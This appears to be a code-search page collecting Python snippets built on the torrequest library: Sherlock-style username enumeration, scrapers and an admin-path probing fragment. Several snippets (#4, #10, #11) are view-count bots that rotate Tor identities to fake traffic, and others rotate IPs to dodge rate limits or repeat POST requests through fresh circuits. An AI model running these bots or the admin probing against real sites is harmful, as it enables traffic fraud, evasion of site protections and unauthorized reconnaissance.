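        # Probe each candidate admin path: HTTP 200 suggests a login page
        # exists, 404 means it does not; other status codes are ignored.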
        for hani in passe:
            curl = url + hani
            web = requests.get(curl)
            if web.status_code == 404:
                print curl + y + '  [' + r + 'X' + y + ']' + r + 'Not Found' + w
            elif web.status_code == 200:
                print curl + y + '  [' + g + '√' + y + ']' + g + 'Found / 200 OK' + w
                os.system('sleep 3.6')

    if men_in == "12":
        about = r + """
</""" + g + """-----------------ABOUT-----------------""" + r + """/>""" + w + """
    Created by     : CapthaCode404_
    Tools          : Blog Tools Pack
    Version        : 1.1
    Premium        : Contact +6283870386264
    Thanks To      : Developer Security45 - BlackCoderCrush""" + r + """
</""" + g + """-----------------ABOUT-----------------""" + r + """/>"""

        print about
    if men_in == "13":
        os.system('xdg-open https://wa.me/6283870386264')
Example #2
def sherlock(username, verbose=False, tor=False, unique_tor=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.

    Return Value:
    Dictionary containing results from report.  Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    global amount
    fname = username + ".txt"

    if os.path.isfile(fname):
        os.remove(fname)
        print(
            "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Removing previous file:\033[1;37m {}\033[0m"
            .format(fname))

    print(
        "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Checking username\033[0m\033[1;37m {}\033[0m\033[1;92m on: \033[0m"
        .format(username))

    # A user agent is needed because some sites don't
    # return the correct information since they think that
    # we are bots
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'
    }

    # Load the data
    data_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                  "data.json")
    with open(data_file_path, "r", encoding="utf-8") as raw:
        data = json.load(raw)

    # Allow 1 thread for each external service, so `len(data)` threads total
    executor = ThreadPoolExecutor(max_workers=len(data))

    # Create session based on request methodology
    underlying_session = requests.session()
    underlying_request = requests.Request()
    if tor or unique_tor:
        underlying_request = TorRequest()
        underlying_session = underlying_request.session()

    # Create multi-threaded session for all requests
    session = FuturesSession(executor=executor, session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            print(
                "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Illegal Username Format For This Site!"
                .format(social_network))
            results_site["exists"] = "illegal"
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url

            # This future starts running the request in a new thread, doesn't block the main thread
            future = session.get(url=url, headers=headers)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type = get_response(request_future=future,
                                     error_type=error_type,
                                     social_network=social_network,
                                     verbose=verbose)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:  # the request may have failed entirely
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:  # the response text or encoding may be unavailable
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if error not in r.text:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 404
            if r.status_code != 404:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "response_url":
            error = net_info.get("errorUrl")
            # Checks if the redirect url is the same as the one defined in data.json
            if error not in r.url:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "":
            print(
                "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Error!"
                .format(social_network))
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    print(
        "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Saved: \033[37;1m{}\033[0m"
        .format(username + ".txt"))

    final_score(amount, fname)
    return results_total
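
A minimal usage sketch for sherlock() above (hypothetical call site; "johndoe" is a placeholder username, and it assumes the module-level pieces the function relies on, namely the global amount counter, data.json, and the helpers get_response, write_to_file and final_score, are defined as in the original script):

if __name__ == "__main__":
    results = sherlock("johndoe", verbose=True)
    for site, info in results.items():
        if info.get("exists") == "yes":
            print(site, "->", info["url_user"])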
Example #3
import csv
from bs4 import BeautifulSoup
import time
from torrequest import TorRequest
import random
from constants import BLANK, browsers

tr = TorRequest(proxy_port=9050, ctrl_port=9051, password=None)

headers = {'User-Agent': random.choice(browsers)}

words = list()

with open('gre2020-thesaurus-syn.csv') as f:
    reader = csv.DictReader(f)
    for row in reader:
        words.append(row)


def save_words(words):
    fieldnames = [
        'word', 'ko', 'zh_Hans', 'etym_zh_Hans', 'pron', 'ant', 'syn', 'etym'
    ]
    with open('gre2020-thesaurus-syn.csv', 'w') as f:
        writer = csv.DictWriter(f, fieldnames)
        writer.writeheader()
        for data in words:
            writer.writerow(data)


failed = list()
Example #4
import requests
import time
import sys
from torrequest import TorRequest

headers = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
}

print "Website Viewer"
#Default Tor port configuration
proxyPort = 9050
ctrlPort = 9051
site = raw_input("Enter your Site Address : ")
hits = input("Enter The number of Viewers : ")


def run():
    response = tr.get(site, headers=headers, verify=False)
    print "[" + str(i) + "]" + " Site View Added With IP:" + tr.get(
        'http://ipecho.net/plain').content
    tr.reset_identity()


if __name__ == '__main__':
    with TorRequest(proxy_port=proxyPort, ctrl_port=ctrlPort,
                    password=None) as tr:
        for i in range(hits):
            run()
Example #5
import time
import urllib3
from torrequest import TorRequest

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

## BEGINNING OF CONFIGURATION

url = 'URL'

cookies = {}

headers = {}

data = ''

## END OF CONFIGURATION

no_of_requests = 50
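
# Each iteration opens a fresh TorRequest context, so the POST below can go out
# through a different Tor exit node every time.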

for x in range(no_of_requests):
    with TorRequest() as tr:
        response1 = tr.get('http://ipecho.net/plain')
        response2 = tr.post(url,
                            headers=headers,
                            cookies=cookies,
                            data=data,
                            verify=False)
        print(str(x) + " " + response1.text + " " + response2.text)
        tr.close()
    time.sleep(3)
Example #6
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 15 16:04:31 2019

@author: chevik
"""
from stem import Signal
from stem.control import Controller
import requests
import re
import json
from requests import Request, Session
from torrequest import TorRequest
tr = TorRequest(password='******')
tr.reset_identity()  # Reset Tor

_cookies_list = []
class PeriscopeBot:
    _apiUrl = 'https://api.periscope.tv/api/v2'
    _session = ''
    _token = ''
    _broadcast_id = 0

    def __init__(self, broadcast_id):
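        # Reuse the Tor-backed requests session so all API calls exit via Tor.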
        self._session = tr.session
        self._session.headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
        self._session.headers['Accept-Encoding'] = 'gzip, deflate, br'
        self._session.headers['Cache-Control'] = 'max-age=0'
        self._session.headers['Host'] = 'api.periscope.tv'
        self._session.headers['Upgrade-Insecure-Requests'] = '1'
Example #7
from torrequest import TorRequest
from news_1 import ListOfData
from random import random
from bs4 import BeautifulSoup as bs
import numpy as np
import time
# print(ListOfData)

ANOTHER_URL = "https://www.google.com/search?q="
tr = TorRequest(password='******')
tr.reset_identity()
lnght = len(ListOfData)
x = 0
delays = [random() for _ in range(10)] * 5

with open("news_2.py", "w") as fo:
    fo.writelines("BetterData = [\n")
    while True:
        if x >= lnght:
            break
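        # Every 8 links, rebuild the TorRequest and reset the circuit to
        # rotate to a new exit IP.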
        if x % 8 == 0:
            tr = TorRequest(password='******')
            tr.reset_identity()

        link = ListOfData[x][0]

        response = tr.get(ANOTHER_URL + link)
        soup = bs(response.content, "lxml")
        body = soup.body
        error_count = 0
Example #8
# Source: https://github.com/Rage997/Cheap-Flight-Finder/blob/master/main.py

from torrequest import TorRequest
import smtplib



tr = TorRequest(password='******')
#
# import requests
# response = requests.get('http://ipecho.net/plain')
# print("My Original IP Address:", response.text)

tr.reset_identity()  # Reset Tor
response = tr.get('http://ipecho.net/plain')
print("New IP Address:", response.text)


# Email settings
gmailUsername = "******"
gmailPassword = "******"

def sendmail(username,password,msg):
    server = smtplib.SMTP('smtp.gmail.com:587')
    server.starttls()
    server.login(username,password)
    server.sendmail(username, username, msg)
    server.quit()

def searchOpodo(searchURL,maxPrice):
    # GET from server
Example #9
# NOTE: truncated snippet; `marketplace`, `get_financial`, `get_summary` and
# `compute_financial` are defined elsewhere in the original script.
from datetime import datetime

import pandas as pd
from torrequest import TorRequest


def select_company():
    print(datetime.now().strftime("%H:%M:%S"),
          "### SELECT COMPANIES FROM XLSX ###")
    main_company = pd.read_excel('XLS/yahoo_tickers.xlsx',
                                 sheet_name='Stock',
                                 skiprows=3)
    df_companies = main_company[main_company['Exchange'] == marketplace]
    print("Start the scrapping for ", len(df_companies))
    list_tickers = df_companies['Ticker'].tolist()
    return list_tickers


if __name__ == '__main__':
    nb_requests, analyzed, error = 0, 0, 0
    keyerror_list, valuerror_list, indexerror_list, zerodivision_list = [], [], [], []
    list_companies = select_company()
    with TorRequest(proxy_port=9150, ctrl_port=9051,
                    password='******') as tr:
        # Making 4 requests by company
        for ticker in list_companies:
            try:
                print(ticker)
                nb_requests += 4
                analyzed += 1
                financial = get_financial(tr, ticker)
                summary = get_summary(tr, ticker)
                compute_financial(financial, summary, ticker)
                if nb_requests >= 75:
                    nb_requests = 0

                    r1 = tr.get('http://ipecho.net/plain')
                    tr.reset_identity()
                    r2 = tr.get('http://ipecho.net/plain')
Example #10
 \__|_|  \__,_|_| |_| |_|\___|___|____/ \___/ \__|
                            |_____|
====================================================  
[+] Tool By ERROR_KI11ER
____________________________________________________________
"""
import os
import urllib

os.system('clear')
print(name)

try:
    from torrequest import TorRequest
except ImportError:
    os.system('pip install torrequest')
    from torrequest import TorRequest

tr = TorRequest(password=None)

h = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
}
a = input("URL    - ")
x = int(input("Amount - "))


def run():
    for i in range(x):
        tr.reset_identity()
        response = tr.get(a, headers=h)
        print("Added", i + 1, "Views")
Example #11
\033[1;32;40m   ____________________________________________________________
 _              __  __ _          ____        _
| |_ _ __ __ _ / _|/ _(_) ___    | __ )  ___ | |_
| __| '__/ _` | |_| |_| |/ __|   |  _ \ / _ \| __|
| |_| | | (_| |  _|  _| | (__    | |_) | (_) | |_
 \__|_|  \__,_|_| |_| |_|\___|___|____/ \___/ \__|
                            |_____|
\033[1;32;40m       ====================================================  
\033[1;35;40m        [+] \033[1;37mTool By \033[1;31mERROR \033[1;37mKI11ER
\033[1;32;40m____________________________________________________________
"""
try:
	from torrequest import TorRequest
except:
	os.system("pip install torrequest && clear")
	from torrequest import TorRequest

tr = TorRequest(password='******')

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"}
a = str(input("URL    - "))
x = int(input("Amount - "))

def run():
	for i in range(x):
		tr.reset_identity()
		response = tr.get(a, headers=headers)
		print(i + 1)

run()
Example #12
import csv
from collections import defaultdict
from torrequest import TorRequest
import requests
from bs4 import BeautifulSoup

tr = TorRequest(password="******")
tr.reset_identity()
response = tr.get('http://ipecho.net/plain')
print("New Ip Address", response.text)
def get_last_number(files):
    values = []
    for file in files:
        with open(f'{file}.csv', 'r') as f:
            opened_file = f.readlines()
            if opened_file:
                var = opened_file[-1].split('|')[0]
                values.append(int(var))

    if values:
        init = max(values)
    else:
        init = 0
    return init
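
# Usage sketch for get_last_number(): with files bautizo.csv, hileta.csv and
# ezkontza.csv whose rows look like "123|...", it returns the highest leading
# id found on the last line of each file (0 when all files are empty), so a
# crawl can resume where it stopped:
#
#   init = get_last_number(["bautizo", "hileta", "ezkontza"])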


def get_row(id):
    values = ["b", "d", "m"]
    orrialdea = f"https://artxiboa.mendezmende.org/es/busque-partidas-sacramentales/ver.html?id={id}&sacramento="
    fitxategia = None
    for v in values:
        pass  # (loop body truncated in the source example)
Example #13
def get_new_tr_obj():
    tr = TorRequest(proxy_port=9050, ctrl_port=9051, password='******')
    return tr
Example #14
def torIP():
    with TorRequest(proxy_port=9050,
                    ctrl_port=9051,
                    password='******') as tr:
        response = tr.get('http://ipecho.net/plain')
        print(response.text)  # the Tor exit node's IP, not your real address
Example #15
def tor_connect():
    # makes initial tor connection
    tr = TorRequest(password='******')
    return tr
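
Both tor_connect() and the earlier get_new_tr_obj() hand back a live TorRequest
that the caller is responsible for closing; torIP() above gets that for free
from its with-block. A minimal sketch of the manual pattern (IP-echo URL as
used throughout these examples):

tr = tor_connect()
try:
    print(tr.get('http://ipecho.net/plain').text)   # current exit IP
finally:
    tr.close()   # closes the session and controller, and stops any tor process it spawned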
Example #16
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import re
from datetime import timedelta
from unidecode import unidecode
from datetime import datetime as dt
import schedule
import time
from textblob import TextBlob
import csv

from stem import Signal
from stem.control import Controller
from torrequest import TorRequest

with Controller.from_port(port = 9051) as controller:
    controller.authenticate(password='******')
    print("Success!")
    controller.signal(Signal.NEWNYM)
    print("New Tor connection processed")
    torR = TorRequest(password='')
    torR.reset_identity()  # reset the Tor circuit
    response = torR.get('http://ipecho.net/plain')
    print("New Ip Address", response.text)


# Vader Sentiment Analyzer
analyzer = SentimentIntensityAnalyzer()
print('sentiment analyzer is ready!')

# scrape sentiment data
def scrape_nasdaq(stockcode, last_page_num=10):
    """
    Stockcode: FB/NFLX/AMZN/GOOGL
    """
    page_num = 0
Example #17
def snoop(username,
          site_data,
          verbose=False,
          tor=False,
          unique_tor=False,
          proxy=None,
          print_found_only=False,
          timeout=None,
          color=True):
    """Snoop Аналитика.

    Snoop ищет никнеймы на различных интернет-ресурсах.

    Аргументы:
    username               -- Разыскиваемый никнейм.
    site_data              -- Snoop БД поддерживваемых сайтов 
    verbose                -- Подробная вербализация
    tor                    -- Служба Tor
    unique_tor             -- Опция Tor: новая цепочка при поиске для каждого сайта
    proxy                  -- Указание своего proxy
    timeoutout                -- Ограничение времени на ожидание ответа сайта
    color                  -- Монохромный/раскрашиваемый терминал

    Возвращаемые значения:
    Словарь, содержащий результаты из отчета. Ключом словаря является название
    сайта из БД, и значение другого словаря со следующими ключами::
        url_main:      URL основного сайта.
        url_user:      URL ведущий на пользователя (если такой аккаунт найден).
        exists:        Указание результатов теста на наличие аккаунта.
        http_status:   HTTP status code ответа сайта.
        response_text: Текст, который вернулся запрос-ответ от сайта (при ошибке соединения может отсутствовать)
    """

    print_info("разыскиваем:", username, color)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = ElapsedFuturesSession(max_workers=max_workers,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            if not print_found_only:
                print_invalid(social_network,
                              "Invalid username format for this site",
                              color)

            results_site["exists"] = "illegal"
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            results_site['response_time_ms'] = ""
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            #If only the status_code is needed don't download the body
            if net_info["errorType"] == 'status_code':
                request_method = session.head
            else:
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3,
            color=color)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if error not in r.text:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "":
            if not print_found_only:
                print_invalid(social_network, "*Пропуск", color)
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
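
The "status_code" branch above boils down to a single predicate: the account is
treated as found iff the probe came back with a 2XX. A one-line helper makes
the intent explicit (a sketch; snoop() inlines the comparison):

def is_2xx(status_code):
    # success range used by the detection logic: 200 <= code < 300
    return 200 <= status_code < 300

assert is_2xx(200) and is_2xx(204)
assert not is_2xx(301) and not is_2xx(404)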
Example #18
# (this snippet begins mid-function in the source: it appears to be the tail
#  of a title-fixing helper that falls back to get_title() when the Google
#  truncated-title trick fails)
            logging.debug(
                'Could not update title with Google truncated title trick.')
            full_title = get_title(soup)
            logging.debug('Found it anyway here [{}]'.format(full_title))
        else:
            logging.debug('Nothing to do for title [{}]'.format(full_title))
    return full_title.strip()


if __name__ == '__main__':
    print "Enter \n=====\n\n1. for keyword google news dump\n2. for collecting news links meta data"
    user_selection = raw_input('user_selection keyword : ')
    if user_selection == str(1):
        while True:
            with TorRequest(proxy_port=9050,
                            ctrl_port=9051,
                            password=torpassword) as requests:  # note: shadows the requests module
                requests.reset_identity()

                keyword = raw_input('keyword : ')
                try:
                    run(keyword)
                except:
                    print sys.exc_info()
                    print('EXCEPTION CAUGHT in __MAIN__')
                    print("Let's change our public IP, guys!")
                    requests.reset_identity()
    else:
        print "Enter File Name (relative path to current directory) [ structure - url1,url2 ] : "
        file_name = raw_input('file_name_keyword : ')
        file_links = open(file_name, "r").read()
Example #19
from stem import Signal
from stem.control import Controller
import requests
from torrequest import TorRequest

tr = TorRequest(password='******')
tr.reset_identity()  #Reset Tor
response = tr.get('http://ipecho.net/plain')
print("New Ip Address", response.text)
#------------------------------------------------------------
response = requests.get('http://ipecho.net/plain')
print("My Original IP Address:", response.text)
#------------------------------------------------------------

with Controller.from_port(port=9051) as controller:
    controller.authenticate(password='******')
    print("Success!")
    controller.signal(Signal.NEWNYM)
    print("New Tor connection processed")
response = requests.get('http://ipecho.net/plain')
print("IP Address after success s:", response.text)
Example #20
async def sherlock(username,
                   site_data,
                   query_notify,
                   logger,
                   tor=False,
                   unique_tor=False,
                   proxy=None,
                   timeout=None,
                   ids_search=False,
                   id_type='username',
                   tags=[],
                   debug=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    ids_search             -- Search website pages for other usernames and
                              recursively search by them.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username, id_type)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    # TODO: connector
    connector = aiohttp.TCPConnector(ssl=False)
    session = aiohttp.ClientSession(connector=connector)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # print(id_type) # print(social_network)
        if net_info.get('type', 'username') != id_type:
            continue

        site_tags = set(net_info.get('tags', []))
        if tags:
            if not tags.intersection(site_tags):
                continue

        if 'disabled' in net_info and net_info['disabled']:
            continue

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info.get('url').format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True) == True):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            def parse_cookies(cookies_str):
                cookies = SimpleCookie()
                cookies.load(cookies_str)
                return {key: morsel.value for key, morsel in cookies.items()}

            # cookies_file and cookielib come from module scope not shown here
            if os.path.exists(cookies_file):
                cookies_obj = cookielib.MozillaCookieJar(cookies_file)
                cookies_obj.load(ignore_discard=True, ignore_expires=True)
            else:
                cookies_obj = []

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    proxies=proxies,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                )
            else:
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                )

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # TODO: move into top-level function
    async def update_site_data_from_response(site, site_info):
        future = site_info.get('request_future')
        if not future:
            # ignore: search by incompatible id type
            return

        error_type = site_info['errorType']
        site_data[site]['resp'] = await get_response(request_future=future,
                                                     error_type=error_type,
                                                     social_network=site,
                                                     logger=logger)

    tasks = []
    for social_network, net_info in site_data.items():
        future = asyncio.ensure_future(
            update_site_data_from_response(social_network, net_info))
        tasks.append(future)

    await asyncio.gather(*tasks)
    await session.close()

    # TODO: split to separate functions
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)
        if not results_site:
            continue

        # Retrieve other site information again
        url = results_site.get("url_user")
        logger.debug(url)

        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Get the failure messages and comments
        failure_errors = net_info.get("errors", {})

        # TODO: refactor
        resp = net_info.get('resp')
        if not resp:
            logger.error(f'No response for {social_network}')
            continue

        html_text, status_code, error_text, exception_text = resp

        # TODO: add elapsed request time counting
        response_time = None

        if debug:
            with open('debug.txt', 'a') as f:
                status = status_code or 'No response'
                f.write(f'url: {url}\nerror: {str(error_text)}\nr: {status}\n')
                if html_text:
                    f.write(f'code: {status}\nresponse: {str(html_text)}\n')

        # TODO: move info separate module
        def detect_error_page(html_text, status_code, fail_flags, ignore_403):
            # Detect service restrictions such as a country restriction
            for flag, msg in fail_flags.items():
                if flag in html_text:
                    return 'Some site error', msg

            # Detect common restrictions such as provider censorship and bot protection
            for flag, msg in common_errors.items():
                if flag in html_text:
                    return 'Error', msg
